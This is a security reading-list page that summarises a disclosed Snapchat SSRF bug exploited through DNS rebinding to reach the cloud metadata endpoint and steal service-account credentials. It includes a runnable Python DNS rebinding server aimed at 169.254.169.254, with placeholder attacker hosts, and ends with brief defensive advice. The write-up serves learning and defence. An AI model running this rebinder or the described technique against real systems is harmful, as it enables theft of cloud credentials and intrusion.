Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata

Ben Sadeghipour (nahamsec), posted 5 years ago
  • Snapchat had an SSRF vulnerability in an application that fetched resources from a user-supplied location. Such "fetch this URL for me" features are the classic place to find SSRF.
  • The bug was not trivial to exploit, though. The fetched page was loaded into a browser on Snapchat's side, so the attacker's script ran in a browser context, and a browser will not let a script read a cross-origin response unless the target's CORS policy is badly misconfigured (the metadata service's is not).
  • DNS rebinding works around the same-origin policy by changing which IP a hostname resolves to while the page is still loaded. The attacker runs the authoritative DNS for the hostname and answers with a very small TTL (time to live): the first lookup returns the attacker's server, which serves the page and its script; the next lookup returns an internal address. Requests the script then makes to its own origin are delivered to the internal host, yet the browser still treats them as same-origin, so the responses are readable.
  • Here the rebind pointed the hostname at the Google Compute Engine metadata service (the link-local address 169.254.169.254), so the script could read the instance's service-account credentials and send them out. Two practical caveats: browsers cache DNS results for a while regardless of TTL, so the script has to keep polling its own origin until the answer flips; and the current v1 metadata API only answers requests carrying a "Metadata-Flavor: Google" header, which a same-origin fetch is allowed to add, so the header is not a defence against this attack. It is fascinating to see the DNS Rebinding attack used in the wild.
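The rebinding step described above, as an added example that is not code from the report or from nahamsec: a minimal authoritative DNS responder in Python that answers the first A query for a name with the attacker's server and every later A query with the metadata address, both with TTL 0. The hostname and the attacker IP are constructed placeholders; only the 169.254.169.254 metadata address is real. The AAAA handling matters because browsers send A and AAAA lookups together, and an AAAA must not consume the "first answer".

```python
import socket
import struct

ATTACKER_IP = "203.0.113.10"             # constructed (TEST-NET-3): serves the page and its script
TARGET_IP = "169.254.169.254"            # cloud metadata endpoint the rebind swings to
REBIND_NAME = "rebind.attacker.example."  # constructed, hypothetical hostname

QTYPE_A = 1


class Rebinder:
    """First A answer for a name is first_ip, every later one is then_ip.
    ttl=0 tells resolvers not to cache, so the browser's re-lookup reaches us."""

    def __init__(self, first_ip=ATTACKER_IP, then_ip=TARGET_IP, ttl=0):
        self.first_ip, self.then_ip, self.ttl = first_ip, then_ip, ttl
        self.seen = set()

    def answer_for(self, qname):
        key = qname.lower()
        if key in self.seen:
            return self.then_ip
        self.seen.add(key)
        return self.first_ip


def parse_question(msg):
    """Return (txid, qname, qtype, end_offset) for a single-question message."""
    txid, _flags, qdcount = struct.unpack_from("!HHH", msg, 0)
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    off, labels = 12, []
    while True:
        ln = msg[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    qtype, _qclass = struct.unpack_from("!HH", msg, off)
    return txid, ".".join(labels) + ".", qtype, off + 4


def build_response(query, rebinder):
    """Build an authoritative answer; only A queries advance the rebind state."""
    txid, qname, qtype, qend = parse_question(query)
    question = query[12:qend]
    rd = struct.unpack_from("!H", query, 2)[0] & 0x0100   # copy RD bit
    flags = 0x8400 | rd                                    # QR=1, AA=1, RCODE=0
    if qtype != QTYPE_A:
        # NODATA for AAAA etc.: a real browser asks both, and only A must count
        return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0) + question
    ip = rebinder.answer_for(qname)
    header = struct.pack("!HHHHHH", txid, flags, 1, 1, 0, 0)
    # Answer RR: name = pointer to offset 12, type A, class IN, TTL, RDLENGTH 4, RDATA
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, rebinder.ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def build_query(qname, txid=0x1234, qtype=QTYPE_A):
    """Constructed helper: the query a stub resolver would send (RD=1)."""
    labels = qname.rstrip(".").split(".")
    qn = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qn + struct.pack("!HH", qtype, 1)


def answered_ip(resp):
    """Pull the A record out of a response built above (None for NODATA)."""
    _, _, _, end = parse_question(resp)
    if struct.unpack_from("!H", resp, 6)[0] == 0:
        return None
    return socket.inet_ntoa(resp[end + 12:end + 16])


def serve(bind=("0.0.0.0", 5353)):
    """Demo UDP loop; only useful once your domain's NS records delegate to this host."""
    rb = Rebinder()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(bind)
        while True:
            data, peer = s.recvfrom(512)
            try:
                s.sendto(build_response(data, rb), peer)
            except (ValueError, IndexError):
                continue


if __name__ == "__main__":
    serve()
```

The browser-side script simply keeps fetching a path on its own origin; once the answer flips, those same-origin requests land on the metadata service and their bodies are readable. On the defensive side, the fix is to keep the rendering host away from 169.254.169.254 (egress filtering or a metadata-less network position), not to rely on the same-origin policy.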